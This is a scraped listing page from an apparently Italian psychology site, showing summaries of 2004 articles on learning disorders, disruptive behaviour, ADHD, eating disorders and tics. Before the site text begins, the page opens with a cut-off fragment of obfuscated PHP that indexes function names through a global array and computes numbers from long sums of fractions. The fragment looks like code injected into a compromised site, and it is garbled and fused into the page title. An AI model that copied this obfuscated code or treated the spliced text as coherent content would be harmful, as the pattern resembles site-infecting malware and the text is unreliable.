=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) Disturbi Mentali

Area Riservata



Ti ricordiamo che per rendere attivo il tuo account dopo la registrazione, sarà necessario aprire il messaggio email che riceverai e cliccare sul link di attivazione.

Disturbi Mentali

I disturbi dell' apprendimento scolastico (dislessia, disgrafia) PDF 

5 novembre 2004 - a cura di Antonio d'Amore, Psicologo e Psicoterapeuta 

 

Cosa s'intende per Disturbi dell'Apprendimento Scolastico?

Con l'espressione "Disturbi dell'Apprendimento scolastico" (DAS) si fa riferimento ad un insieme di disturbi nella comprensione e nell'uso del linguaggio, sia parlato sia scritto, che si manifestano in una limitazione delle capacità di ascoltare, parlare, leggere, scrivere, ragionare e/o fare calcoli.

 

Leggi tutto...
 
I disturbi da comportamento dirompente PDF 

2 novembre 2004 - a cura di Antonio d'Amore, Psicologo e Psicoterapeuta

 

E’ un fatto comune che un bambino in età prescolare o un adolescente, talvolta, mostri scarsa attenzione alle regole e disobbedisca ai genitori o agli insegnanti. Questo comportamento, però, solitamente non produce effetti negativi importanti. Non si può dire altrettanto delle conseguenze prodotte dagli atteggiamenti e dai comportamenti tipici delle persone con disturbo oppositivo-provocatorio o della condotta.

 

Leggi tutto...
 
Il disturbo da deficit d'attenzione e iperattivita' (ADHD) PDF 

8 novembre 2004 - a cura di Antonio d'Amore, Psicologo e Psicoterapeuta

 

Il Disturbo da Deficit d'Attenzione ed Iperattività (DDAI) è un disturbo neurobiologico caratterizzato da tre distinte manifestazioni: l'iperattività, l'impulsività e la disattenzione.  In base ai sintomi manifestati, si possono distinguere tre categorie di persone con DDAI: quelle che presentano prevalentemente problemi d'iperattività/impulsività; quelle che presentano prevalentemente problemi di distraibilità e quelle che presentano entrambi i problemi.

Leggi tutto...
 
I disturbi dell'alimentazione (anoressia e bulimia) PDF 

4 novembre 2004 - a cura di Antonio d'Amore, Psicologo e Psicoterapeuta

 

E' stato stimato che in Italia il 2% circa della popolazione è affetta da anoressia e bulimia.

A questa percentuale, comunque, va aggiunto un altro 8% circa di persone che, pur non mostrando tutte le caratteristiche essenziali per la diagnosi di anoressia o bulimia, presentano forme subcliniche.

Le persone con un disturbo dell’alimentazione come l'anoressia e la bulimia mostrano emozioni, atteggiamenti e comportamenti estremi nei confronti del cibo e del corpo.

Leggi tutto...
 
I tic PDF 

26 novembre 2004 - a cura di Antonio d'Amore, Psicologo e Psicoterapeuta

 

Si parla di tic motori quando una parte del corpo (ad esempio la faccia, le spalle, le mani o le gambe) si muove ripetutamente, in modo rapido, improvviso ma, soprattutto, incontrollato. Oltre ai tic motori esistono anche quelli di tipo vocale; si parla di tic vocali quando una persona emette suoni o parole in modo ripetuto ed incontrollato.

Leggi tutto...
 
<< Inizio < Prec. 1 2 3 Next > Fine >>

Pagina 2 di 3

Per migliorare la tua navigazione su questo sito, utilizziamo cookies ed altre tecnologie che ci permettono di riconoscerti. Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy.

Acconsento all'utilizzo dei cookies su questo sito